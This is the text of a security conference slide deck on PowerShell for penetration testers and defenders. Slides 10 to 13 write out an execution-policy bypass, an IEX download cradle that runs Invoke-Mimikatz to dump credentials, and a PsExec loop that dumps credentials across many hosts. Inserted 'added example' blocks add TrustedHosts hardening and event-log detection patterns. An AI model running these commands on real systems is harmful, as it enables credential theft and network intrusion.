
PowerShell for Cyber Warriors


1 PowerShell for Cyber Warriors
ABSTRACT: PowerShell, the new hotness, is an interactive object-oriented command environment that has revolutionized the ability to interact with the Windows operating system in a programmatic manner. This environment significantly increases the capabilities of administrators, attackers, defenders, and malware authors alike. This presentation introduces popular PowerShell tools and techniques used by penetration testers and blue team members. Tools range from in-memory-only remote administration tools to Active Directory enumeration and from reverse engineering to incident response. Additionally, we will review a couple of pieces of malware that leverage PowerShell and provide information on detecting or defending against previously discussed attacks. If you're a CyberWarrior, this presentation will undoubtedly up your game by equipping you with knowledge on the almighty PowerShell. PowerShell for Cyber Warriors by Russel Van Tuyl

2 Who Am I? Security Analyst TN Air National Guard SANS MSISE Student
Father of 2, Husband to 1 @Ne0nd0g A little information about me: -I’m a Security Analyst with Sword & Shield here in Knoxville. -I primarily do network vulnerability assessments and penetration testing -I’m a member of the TN ANG here in Knoxville as well -SANS Master of Science in Information Security Engineering -You can reach me by or at Twitter

3 Disclaimer DISCLAIMER
Don’t believe anything I say; verify for yourself If I have something wrong, please let me know; I make mistakes just as everyone does

4 What is PowerShell? Ref: Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked topologies by utilizing standards-based remoting protocols.

5 PowerShell Basics powershell.exe Built on .NET Framework Verb-Noun
Tab Complete Alias Structured Data/Objects Syntax Highlighting (version 5) Released in 2006 on XP*/Vista/Server 2003 .ps1 Modules .psm1 Integrated Scripting Environment (ISE) Powershell.exe replaces the need to use cmd.exe. You can first open cmd.exe and then run powershell.exe for an interactive session. PowerShell has full access to the .NET framework. Commands on the system follow a Verb-Noun structure. Have you ever tried to ‘ls’ on a Windows box? Well, it works just fine in PowerShell thanks to aliases. PowerShell utilizes structured data objects. This allows you to better handle data: you don’t have to try to detect where the data you want is in the output. Version 5 (Windows 10/Server 2016) comes with syntax highlighting. PowerShell was first released in 2006 and installed by default on Windows Vista. PowerShell scripts are saved in .ps1 files. It is important to note that you can’t double-click and run these .ps1 files. PowerShell comes with a built-in IDE, called the PowerShell ISE.

6 PowerShell Basics Get-Help Get-Help is an essential command to know. Use it to find out more about any command you wish to run.

7 PowerShell Basics Get-Member Use the Get-Member cmdlet to get an object's methods, properties, and other attributes

8 Use Cases Powerful tool for interacting with Windows PSRemoting
Why it is used Powerful tool for interacting with Windows PSRemoting Future SSH Integration Antivirus/Application Blacklisting Bypass Red Team Blue Team Malware In Memory only execution IEX Download Cradle Ref: Because of the ability to use the .NET library, write scripts, and interact with objects, PowerShell is an invaluable tool for interacting with Windows. PSRemoting allows you to remotely access a system. You can also run a script from your local machine one time across many computers in a domain or network. Powershell.exe is usually overlooked by antivirus and application restrictions; this makes it a great choice for attackers. Red teams are using it for attack and blue teams are using it for response; malware is using it for evil. PowerShell code can be downloaded into memory and executed using the IEX download cradle; this prevents writing files to disk.

9 PSRemoting Disabled by default Enable-PSRemoting –Force Trusted hosts
5985 (HTTP)/5986 (HTTPS) 47001 Invoke-Command Enter-PSSession A screenshot of establishing a PSRemoting session to a host and subsequently running a few commands. Must set trusted hosts on BOTH computers if not on a domain: Set-Item wsman:\localhost\client\trustedhosts * Ref:
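The slide's TrustedHosts wildcard is fine for a lab but means the WinRM client will send NTLM credentials to any endpoint that answers on 5985/5986. The following is an added example (not from the deck) that audits the current value and replaces the wildcard with an explicit allow-list; the host names and addresses in it are placeholders, and it assumes an elevated Windows PowerShell session.

```powershell
# Added example, not part of the original presentation.
# Audit the WinRM client TrustedHosts list and replace a wildcard with an allow-list.

# A bare '*' means non-Kerberos (NTLM/Basic) auth will be attempted against ANY host,
# so a rogue listener on the network can collect the client's credentials.
$current = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($current -eq '*') {
    Write-Warning "TrustedHosts is '*': the client trusts every host for non-Kerberos auth."
}

# Weak lab setting from the slide, shown for contrast:
#   Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force

# Corrected: list only the specific management hosts that need non-domain remoting.
$allowed = 'lab-admin01', '10.0.0.10'     # placeholder names/addresses
Set-Item WSMan:\localhost\Client\TrustedHosts -Value ($allowed -join ',') -Force

# Prefer the HTTPS listener (5986) so session traffic is TLS-protected when Kerberos
# is unavailable. Each listener's keys show its transport (HTTP vs HTTPS) and bind address.
Get-ChildItem WSMan:\localhost\Listener | ForEach-Object { $_.Keys -join ' ' }

# Verify the new TrustedHosts value.
(Get-Item WSMan:\localhost\Client\TrustedHosts).Value
```

Once hosts are domain-joined, Kerberos is used for remoting and TrustedHosts can be left empty entirely.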

10 Module & Script Loading
Execution Policy The execution policy determines whether PowerShell scripts can be run on a host. Change it to Unrestricted to run PowerShell scripts on a lab host. If you can’t change the execution policy, you can bypass it with powershell.exe -ExecutionPolicy Bypass -File .\runme.ps1. PowerShell modules (.psm1 files) can be imported using the Import-Module cmdlet. Additionally, .ps1 files can be imported using dot sourcing (. .\script.ps1). The IEX download cradle is an essential tool for downloading PowerShell scripts from a remote host into memory. You can terminate the command with a semicolon and immediately run a command from the script. IEX (New-Object System.Net.Webclient).DownloadString(' -h Ref: Import-Module Dot Sourcing IEX Download Cradle

11 IEX Download Cradle IEX (New-Object Net.WebClient).DownloadString(' Invoke-Mimikatz -DumpCreds A screenshot of the IEX download cradle being used to download Invoke-Mimikatz.ps1 from its GitHub repository and then execute it on a Windows 7 host. Clear-text creds are in the red box. Expanded, the command is:
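The abstract promises detection guidance for the attacks shown, and the cradle on this slide leaves a clear trace once script block logging is on: every script block PowerShell 5.x compiles is written to event 4104, including the DownloadString text. The following is an added example (not from the deck) that enables the logging policy and sweeps the last 24 hours of 4104 events for cradle indicators; it assumes an elevated Windows PowerShell 5.x session.

```powershell
# Added example, not part of the original presentation.
# 1. Enable script block logging (the same policy key Group Policy sets).
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Regex indicators drawn from the cradle and bypass shown in these slides.
$patterns = @(
    '\bIEX\b',
    'Invoke-Expression',
    'DownloadString',
    'Net\.WebClient',
    '-ExecutionPolicy\s+Bypass'
)

# 3. Pull script block events (ID 4104) from the last 24 hours.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue   # no events in range raises an error otherwise

# 4. Report each event whose logged script text matches one or more indicators.
$hits = foreach ($e in $events) {
    $text    = $e.Message          # includes the full script block text
    $matched = $patterns | Where-Object { $text -match $_ }
    if ($matched) {
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Indicator = ($matched -join ', ')
            Snippet   = $text.Substring(0, [Math]::Min(120, $text.Length)) -replace '\s+', ' '
        }
    }
}
$hits | Sort-Object Time | Format-Table -AutoSize
```

Because the cradle never touches disk, this event log (forwarded centrally) is often the only artifact a responder has; the sweep itself will also appear in 4104 since it contains the indicator strings.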

12 Mass Mimikatz Part 3 A blog post I wrote on doing Mimikatz en masse across a large network. This blog post outlines how I used a PowerShell ForEach loop to download Invoke-Mimikatz.ps1 with the IEX download cradle. The output is then saved to a network share. A Python script was written to parse all the files.

13 Mass Mimikatz Part 3 ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\ \data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\ \data\%COMPUTERNAME%.txt}"} PowerShell statement for Mass Mimikatz

14 Mass Mimikatz Part 3

15 PowerShell Tools - Attack
PowerShellArsenal PowerShell Suite PowerMemory PowerShell-AD-Recon Fathomless OffensivePowerShellTasking PoshRat Metasploit DSInternals DSCompromised OWA-Toolkit Empire - a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture PowerSploit - collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment PowerTools - a collection of PowerShell projects with a focus on offensive operations. Kansa - a modular incident response framework Nishang - a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing PowerCat - Netcat in PowerShell Inveigh - LLMNR/NBNS spoofer PowerShellArsenal - a PowerShell module used to aid a reverse engineer Subvert-PE.ps1 - programmatically injecting shellcode into PE executables on disk; now part of “PowerShell Suite” PowerMemory - exploit the credentials present in files and memory PowerSploit Nishang PowerCat Inveigh Empire Kansa DarkObserver PowerPath

16 Procrastination I’ll do it later… This is about as far as I made it before we were asked to turn our slides in. Sorry about that! I do have a solution though. Visit to grab the completed copy of the presentation for B-Sides Knoxville. Well, maybe.

17 Conclusion

